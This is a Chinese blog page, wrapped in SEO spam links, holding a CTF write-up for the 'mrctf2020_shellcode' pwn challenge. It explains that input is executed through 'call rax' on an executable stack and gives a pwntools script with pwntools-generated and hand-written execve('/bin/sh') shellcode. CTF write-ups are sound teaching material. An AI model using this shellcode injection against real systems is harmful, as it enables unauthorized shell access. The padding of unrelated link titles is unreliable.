当前位置: 首页 > news >正文

专门做男士用品的网站杭州市公共资源交易中心

专门做男士用品的网站,杭州市公共资源交易中心,网站建设宁夏凤凰云,网站建设费用报价表题目来自视频:链接:https://pan.baidu.com/s/17vX9dbfHkXBw71mcEXBgNQ?pwd6666 提取码:6666查看文件类型和保护,虽然现在的我还没有明白太多的保护。64位,放到ida里边rbp:保存的是栈中当前执行函数的基本地址。当前执…

题目来自视频:

链接:https://pan.baidu.com/s/17vX9dbfHkXBw71mcEXBgNQ?pwd=6666

提取码:6666

  1. 查看文件类型和保护,虽然现在的我·还没有明白太多的保护。

64位,放到ida里边

rbp:保存的是栈中当前执行函数的基本地址。当前执行函数所有存储在

栈上的数据都要靠rbp指针加上偏移量来读取。、

rsp:栈指针,永远指向栈顶。

这里使用了视频说这里用了 call rax所以不能用F5

最重要的是最后,call rax,[rbp+buf]

他的意思就是执行输入的内容

那么如果我们输入shellcode不久获取到了权限了吗。

可以用gdb检查下执行权限

先下断点到main然后运行

然后再vmmap

最后一个栈是可以执行的。也就是我们写入的数据。

脚本:

这里的脚本有两个shellcode

一个是手写的,另一个是pwn生成的。

选其一即可。

from pwn import *
context(os='linux',arch='amd64',terminal=['tmux','sp','-h']) //声明系统
#p=remote('node3.buuoj.cn',27250)  
p=process('./mrctf2020_shellcode') //本地连接shellcode1=shellcraft.sh()  //  用pwntools生成shellcode
payload1=asm(shellcode1)  //asm将shellcode(汇编)转换成机器码shellcode2='''mov rbx,0x68732f6e69622fpush rbxpush rsppop rdixor esi,esixor edx,edxpush 0x3bpop raxsyscall
'''
payload2=asm(shellcode2)
#gdb.attach(p)
p.send(payload2)#p.send(payload1)
p.interactive()   //进行交互相当于回到shell的模式,在取得shell之后使用

http://www.yayakq.cn/news/244960/

相关文章:

  • 响应式网站建设信息手机app开发网站模板下载
  • 网站栏目管理建设少女映画wordpress
  • 延吉网站制作自己做淘宝客网站吗
  • 江门网站快速排名优化大连开发区规划建设局网站
  • 网站做收录要多少长时间珠海网站建设策略
  • 苍南做网站无锡专业网站建设公司
  • 商丘做网站多少钱安徽工程建设信息网实名制查询
  • 网站建设调查报告范文网站知名度
  • 网站的备案号在哪wordpress iis 安装
  • wordpress更改站点地址十大销售管理软件排行榜
  • 网站建设网页怎么排列顺序网站建设的一般过程包括哪些
  • 网站没有后台登陆文件夹wordpress菜单种类
  • 西安网站seo公司360建站平台
  • 怎么样做网站 用网站赚钱做头发个人网站制作素材
  • 报名窗口网站建设营销网络是什么
  • 苏州做网站好的外贸网站增加外链方法
  • 做淘宝网站需要什么无锡网站推
  • 网站备案 哪个省怎么免费制作公司网页
  • 如何做美食网站免费企业黄页查询官网
  • 外贸开发产品网站模板网站图片标题背景怎样做的
  • 网站建设拾金手指下拉做网站服务器需要自己提供吗
  • 做网站的软件page中卫网站设计公司排名
  • 厦门seo网站管理网站建设什么是开发实施实施
  • 网站建设价格差别燕郊网站建设公司
  • 格泰网站建设网站做seo外链
  • 机械手表网站net112企业建站系统
  • 家居网站建设咨询用自己电脑做网站 dns
  • 南通网站设计制作公司软件开发工具性能审计不包括
  • 温州网站改版公司金坛市建设局网站
  • 自己怎么做电影网站建站平台在线提交功能